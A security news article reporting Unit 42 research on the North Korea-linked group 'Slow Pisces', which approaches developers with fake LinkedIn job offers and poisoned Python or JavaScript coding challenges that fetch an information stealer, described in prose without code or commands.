DevOps, Endpoint/Device Security, Career Management

Developers in the crosshairs of notorious DPRK crew ‘Slow Pisces’

Korea North flag - 3D realistic waving flag on matrix digital ba

(Adobe Stock)

A North Korea-affiliated cybercrime operation has turned its attention to targeting developers in hopes of obtaining access upstream and in supply chain.

The group known as "Slow Pisces" has been socially engineering developers by targeting LinkedIn profiles with job offers that lead to poisoned coding challenges, according to researchers with the Palo Alto Networks Unit 42 security team.

In a typical attack, the threat actor would contact a targeted (or spam out to multiple) developer profiles while presenting themselves as a job recruiter. The target would then be asked to complete a coding challenge — a common assessment tool in which the developer is placed in a controlled environment and asked to complete a series of coding problems.

This is where the attack by the Democratic People's Republic of Korea (DPRK)-linked hackers picks up. Within that coding challenge environment is a malicious script embedded within either a Python or Javascript code repository. No other languages are offered in any significant quantity.

“This scarcity suggests attackers might have created repositories on demand, based on a target's preferred programming language,” the Unit 42 researchers explained.

“Consequently the group more frequently used languages more popular in the cryptocurrency sector, such as JavaScript and Python.”

The repository, in turn, redirects the user to a command-and-control server that determines if that system contains data that is useful to the attackers and, if so, installs a malicious payload. The screening criteria includes IP address, geolocation, time zone, and HTTP headers.

Should the target be deemed worthy of attack, the server will then install and execute a malware package which is believed by researchers to be an information stealer. If not, the connection is terminated.

Targeting developers has become an increasingly popular tactic for threat actors and cybercriminals due to the key role they play in the software chain. In addition to direct malware attackers, threat actors have been targeting developers by seeding code repositories with poisoned libraries that mimic those most commonly used by developers.

By compromising a developer’s machine, the attacker can gain access to their coding projects and insert their own backdoors into the eventual product. Additionally, a compromised service or infrastructure program can then be used to take over the systems of any customers further down the stream.

In this case, it is believed that the Slow Pisces hackers are trying to go after developers and organizations operating in the cryptocurrency sector. The Unit 42 team noted that the LinkedIn profiles associated with the attack were almost all impersonating prominent cryptocurrency companies and exchanges.

The matches the behavioral patterns of Slow Pisces, as well as other North Korean threat actors. Facing heavy monetary and trade sanctions, the Hermit Kingdom has looked to cryptocurrency as a way to generate cash outside of the international trade market.

Shaun Nichols

A career IT news journalist, Shaun has spent 17 years covering the industry with a specialty in the cybersecurity field.

Related

Advanced cryptojacking attack set sights on Docker

Docker environments have been subjected to a novel cryptojacking malware campaign that facilitated cryptomining by establishing a link to the Web3 service teneo.pro, which allows social media data monetization, Infosecurity Magazine reports.

Related Events

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

Anti-MalwareAntivirus SoftwareBring Your Own Device (BYOD)Ephemeral PortExtranetEndpoint SecurityFirmwareKeyloggerRegistry

You can skip this ad in 5 seconds